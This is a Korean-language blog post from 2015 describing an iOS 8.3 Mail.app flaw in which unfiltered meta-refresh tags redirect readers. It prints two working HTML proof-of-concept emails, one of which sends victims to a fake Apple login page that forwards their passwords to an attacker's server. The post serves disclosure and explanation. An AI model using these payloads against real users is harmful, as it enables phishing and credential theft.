iOS Mail.app(8.3 or below) redirect-able vulnerability

6/11/2015 , 0 Comments

iOS 8.3 이하 버전의 Mail.app 에서 redirect 가능한 취약점이 공개되었습니다.
<meta http-equiv=refresh>가 필터링 되고 있지 않기 때문에 발생한 취약점입니다.

poof of concept 코드는 아래와 같습니다.

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv=refresh content=0;URL=http://repo.kr>

</head>
<body>
    <p>test PoC</p>
</body>
</html>

참고로, Putsmail(https://putsmail.com) 을 이용하면, HTML이 포함된 메일을 전송할 수 있습니다.


위의 메일을 iOS 8.3 Mail.app 에서 확인해보겠습니다.
  

임의의 페이지로 redirection 되는 것을 확인할 수 있습니다.
해당 취약성을 이용해서, Phishing 공격에 악용될 수 있습니다.

Jan Soucek은 위의 취약성을 이용하여 사용자의 Apple Account 공격 가능한 PoC(https://github.com/jansoucek/iOS-Mail.app-inject-kit)를 공개했습니다.
Jan Soucek은 HTML과 CSS를 이용하여 Apple Login View처럼 보이는 Phishing용 Page를 만들었습니다.

아래와 같이 Phishing Site로 Redirection할 수 있도록 HTML코드를 작성합니다.

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, width=device-width, height=device-height" name="viewport">
    <meta http-equiv=refresh content=0;URL=http://repo.kr/iOS-Mail-inject-kit/mail-inject/index.php?modal-username=h2spice@gmail.com />
    <style>
      html, body {
        position: relative;
        height: 100%;
        width: 100%;
        overflow-x: hidden;
      }
      
      body {
        font-family: Helvetica Neue,Helvetica,Arial,sans-serif;
        margin: 0;
        padding: 0;
        color: #000;
        font-size: 14px;
        line-height: 1.4;
        width: 100%;
        height: 110%;
        -webkit-text-size-adjust: 100%;
        background: #fff;
        overflow: hidden;
      }
    </style>
</head>
<body>
    <p>test PoC</p>
</body>
</html>

위 HTML코드를 Victim에게 전송합니다.

해당 메일을 받은 Victim은 아래 그림과 같이, Apple Log in View를 볼 수 있는데,  Password를 입력하게 되면, 공격자의 서버로 패스워드가 전송됩니다.


서버에 전송된 Victim의 E-mail/Password는 아래와 같습니다.


If you need my help, tell me anytime. Facebook